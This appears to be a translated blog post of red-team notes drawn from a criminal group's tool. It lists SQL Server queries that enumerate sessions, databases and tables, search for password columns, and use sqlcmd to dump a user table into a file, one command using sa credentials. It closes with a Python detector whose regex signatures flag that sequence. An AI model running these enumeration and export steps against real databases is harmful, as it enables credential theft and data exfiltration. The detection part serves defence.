A few notes written down in case someone on a red team can use them
The other day, on the T00ls forum, I saw a tool released by a black-industry (criminal) group and wrote down some tricks that a red team could use.
View the login name and host name of each session connected to the database
select loginame, hostname from sys.sysprocesses;
List all databases, then each user database with its size in MB (database_id > 4 skips the system databases; size is counted in 8 KB pages)
SELECT name FROM master.dbo.sysdatabases;
SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) AS size_mb FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;
List all tables in the specified database
use LazyOA; exec sp_tables
List the row count and on-disk size of each table in the specified database (largest first)
USE LazyOA;
SELECT TOP 100
    s.Name AS SchemaName,
    t.Name AS TableName,
    p.rows AS RowCounts,
    CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB
FROM sys.tables t
    INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id
    INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id
    INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id
    INNER JOIN sys.schemas s ON t.schema_id = s.schema_id
GROUP BY t.Name, s.Name, p.Rows
ORDER BY RowCounts DESC, Total_MB DESC;
Count the rows in a specified table
select count(*) from LazyOA.dbo.Sys_Role;
Show the first 10 rows of a specified table (two equivalent forms)
select top 10 * from LazyOA.dbo.Sys_Role;
use LazyOA; select top 10 * from Sys_Role;
Search column names in the specified database (here, any column whose name contains "pass")
select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from LazyOA.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';
Export data from a specified table with sqlcmd (pipe-delimited, written to a file)
Windows authentication (trusted connection, -E); %databasename% and %tablename% are placeholders
sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt"
SQL Server login (-U / -P)
sqlcmd.exe -S localhost -U sa -P admin -Q "select * from LazyOA.dbo.Sys_User" -W -s"|" -o "C:\Users\dbadmin\Desktop\1\1.txt"
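From the defender's side, the queries above form a recognisable sequence: session enumeration, database and table listing, a column search for "pass", then a sqlcmd export to a file. The following is an added example, not from the original post or the tool it describes: it assumes a constructed pipe-delimited feed (timestamp|login|host|statement) that merges SQL Server audit statements with process-creation command lines, and flags any login/host pair that touches three or more of these enumeration categories. The signature regexes and category names are my own assumptions.

```python
import re
from collections import defaultdict

# Signatures for the enumeration steps shown on this page (assumed, not exhaustive).
RECON_SIGNATURES = {
    "session_enum":  re.compile(r"\bsys\.sysprocesses\b|\bsys\.dm_exec_sessions\b", re.I),
    "database_enum": re.compile(r"\bsysdatabases\b|\bsys\.databases\b|\bsys\.master_files\b", re.I),
    "table_enum":    re.compile(r"\bsp_tables\b|\bsys\.tables\b|\bsys\.partitions\b", re.I),
    "column_search": re.compile(r"INFORMATION_SCHEMA\.COLUMNS.*?COLUMN_NAME\s+LIKE\s+'%(pass|pwd)", re.I),
    "bulk_export":   re.compile(r"\bsqlcmd(\.exe)?\b.*\s-o\s", re.I),
}

# Constructed sample feed: timestamp|login|host|statement-or-command-line
SAMPLE_LOG = """\
2024-05-01T10:00:01|sa|WKS-17|select loginame, hostname from sys.sysprocesses;
2024-05-01T10:00:05|sa|WKS-17|SELECT name FROM master.dbo.sysdatabases;
2024-05-01T10:00:20|sa|WKS-17|use LazyOA; exec sp_tables
2024-05-01T10:01:02|sa|WKS-17|select COLUMN_NAME from LazyOA.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';
2024-05-01T10:02:30|sa|WKS-17|sqlcmd.exe -S localhost -U sa -Q "select * from LazyOA.dbo.Sys_User" -o "C:\\Windows\\Temp\\1.txt"
2024-05-01T10:03:00|app_svc|APP-01|SELECT TOP 10 * FROM LazyOA.dbo.Sys_Role WHERE Id = @p1;
2024-05-01T10:03:10|app_svc|APP-01|SELECT name FROM sys.databases;
"""

def parse_line(line):
    # maxsplit=3 keeps any '|' inside the statement (e.g. sqlcmd -s"|") in the last field
    ts, login, host, stmt = line.split("|", 3)
    return ts, login, host, stmt

def classify(stmt):
    """Return the set of enumeration categories a single statement matches."""
    return {name for name, rx in RECON_SIGNATURES.items() if rx.search(stmt)}

def score_sessions(log_text, threshold=3):
    """Group matches by (login, host) and return only the pairs that hit at
    least `threshold` distinct categories, mapped to their sorted categories."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, login, host, stmt = parse_line(line)
        hits[(login, host)] |= classify(stmt)
    return {key: sorted(cats) for key, cats in hits.items() if len(cats) >= threshold}

if __name__ == "__main__":
    for (login, host), cats in score_sessions(SAMPLE_LOG).items():
        print(f"ALERT {login}@{host}: {', '.join(cats)}")
```

The threshold keeps a single legitimate `sys.databases` query from alerting; tune the categories and threshold to what your own application accounts normally run.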